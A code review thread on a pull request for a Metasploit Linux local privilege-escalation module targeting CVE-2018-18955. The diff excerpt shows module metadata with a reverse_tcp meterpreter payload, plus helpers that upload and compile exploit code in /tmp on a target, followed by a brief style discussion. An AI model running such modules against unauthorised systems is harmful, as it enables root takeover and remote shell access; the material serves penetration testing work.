modules/exploits/linux/local/nested_namespace_idmap_limit_priv_esc.rb

```diff
@@ -0,0 +1,232 @@
+        ],
+      'DisclosureDate' => 'Nov 15 2018',
+      'Platform'       => ['linux'],
+      'Arch'           => [ARCH_X86, ARCH_X64],
+      'SessionTypes'   => ['shell', 'meterpreter'],
+      'Targets'        => [['Auto', {}]],
+      'Privileged'     => true,
+      'References'     =>
+        [
+          ['BID', '105941'],
+          ['CVE', '2018-18955'],
+          ['EDB', '45886'],
+          ['PACKETSTORM', '150381'],
+          ['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1712'],
+          ['URL', 'https://github.com/bcoles/kernel-exploits/tree/master/CVE-2018-18955'],
+          ['URL', 'https://lwn.net/Articles/532593/'],
+          ['URL', 'https://bugs.launchpad.net/bugs/1801924'],
+          ['URL', 'https://people.canonical.com/~ubuntu-security/cve/CVE-2018-18955'],
+          ['URL', 'https://security-tracker.debian.org/tracker/CVE-2018-18955'],
+          ['URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=d2f007dbe7e4c9583eea6eb04d60001e85c6f1bd'],
+          ['URL', 'https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.18.19'],
+          ['URL', 'https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.19.2']
+        ],
+      'DefaultTarget'  => 0,
+      'DefaultOptions' =>
+        {
+          'AppendExit'       => true,
+          'PrependSetresuid' => true,
+          'PrependSetreuid'  => true,
+          'PrependSetuid'    => true,
+          'PrependFork'      => true,
+          'WfsDelay'         => 60,
+          'PAYLOAD'          => 'linux/x86/meterpreter/reverse_tcp'
+        },
+      'Notes' =>
+        {
+          'AKA' => ['subuid_shell.c']
+        }
+      ))
+    register_options [
+      OptEnum.new('COMPILE', [true, 'Compile on target', 'Auto', %w[Auto True False]])
+    ]
+    register_advanced_options [
+      OptBool.new('ForceExploit',  [false, 'Override check result', false]),
+      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
+    ]
+  end
+
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
+  def upload(path, data)
+    print_status "Writing '#{path}' (#{data.size} bytes) ..."
+    rm_f path
+    write_file path, data
+    register_file_for_cleanup path
+  end
+
+  def upload_and_chmodx(path, data)
+    upload path, data
+    chmod path
+  end
+
+  def upload_and_compile(path, data)
+    upload "#{path}.c", data
+
+    gcc_cmd = "gcc -o #{path} #{path}.c"
+    if session.type.eql? 'shell'
+      gcc_cmd = "PATH=$PATH:/usr/bin/ #{gcc_cmd}"
+    end
+    output = cmd_exec gcc_cmd
+
+    unless output.blank?
+      print_error output
+      fail_with Failure::Unknown, "#{path}.c failed to compile. Set COMPILE False to upload a pre-compiled executable."
+    end
+
+    register_file_for_cleanup path
+    chmod path, 0755
+  end
+
+  def exploit_data(file)
+    path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2018-18955', file
+    fd = ::File.open path, 'rb'
```

Comment:
Is there a reason not to use a block here?

Reply:
Copypasta

```
# grep -rn "path = ::File.join Msf::Config.data_directory" modules/exploits/ -A 1
modules/exploits/linux/local/bpf_sign_extension_priv_esc.rb:135:    path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2017-16995', file
modules/exploits/linux/local/bpf_sign_extension_priv_esc.rb-136-    fd = ::File.open path, 'rb'
--
modules/exploits/linux/local/nested_namespace_idmap_limit_priv_esc.rb:123:    path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2018-18955', file
modules/exploits/linux/local/nested_namespace_idmap_limit_priv_esc.rb-124-    fd = ::File.open path, 'rb'
--
modules/exploits/linux/local/af_packet_packet_set_ring_priv_esc.rb:110:    path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2017-7308', file
modules/exploits/linux/local/af_packet_packet_set_ring_priv_esc.rb-111-    fd = ::File.open path, 'rb'
--
modules/exploits/linux/local/rds_priv_esc.rb:107:    path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2010-3904', file
modules/exploits/linux/local/rds_priv_esc.rb-108-    fd = ::File.open path, 'rb'
--
modules/exploits/linux/local/abrt_raceabrt_priv_esc.rb:143:    path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2015-3315', 'raceabrt'
modules/exploits/linux/local/abrt_raceabrt_priv_esc.rb-144-    fd = ::File.open path, 'rb'
--
modules/exploits/linux/local/glibc_realpath_priv_esc.rb:106:    path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2018-1000001', file
modules/exploits/linux/local/glibc_realpath_priv_esc.rb-107-    fd = ::File.open path, 'rb'
--
modules/exploits/linux/local/libuser_roothelper_priv_esc.rb:186:      path = ::File.join Msf::Config.data_directory, 'exploits', 'roothelper', 'roothelper.c'
modules/exploits/linux/local/libuser_roothelper_priv_esc.rb-187-      fd = ::File.open path, 'rb'
--
modules/exploits/linux/local/libuser_roothelper_priv_esc.rb:205:      path = ::File.join Msf::Config.data_directory, 'exploits', 'roothelper', 'roothelper'
modules/exploits/linux/local/libuser_roothelper_priv_esc.rb-206-      fd = ::File.open path, 'rb'
--
modules/exploits/linux/local/af_packet_chocobo_root_priv_esc.rb:119:    path = ::File.join Msf::Config.data_directory, 'exploits', 'CVE-2016-8655', file
modules/exploits/linux/local/af_packet_chocobo_root_priv_esc.rb-120-    fd = ::File.open path, 'rb'
--
modules/exploits/linux/local/ufo_privilege_escalation.rb:112:    path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2017-1000112', file
modules/exploits/linux/local/ufo_privilege_escalation.rb-113-    fd = ::File.open path, 'rb'
--
modules/exploits/linux/local/recvmmsg_priv_esc.rb:93:    path = ::File.join Msf::Config.data_directory, 'exploits', 'CVE-2014-0038', file
modules/exploits/linux/local/recvmmsg_priv_esc.rb-94-    fd = ::File.open path, 'rb'
--
modules/exploits/linux/local/apport_abrt_chroot_priv_esc.rb:144:    path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2015-1318', 'newpid'
modules/exploits/linux/local/apport_abrt_chroot_priv_esc.rb-145-    fd = ::File.open path, 'rb'
```

Reply:
Fixed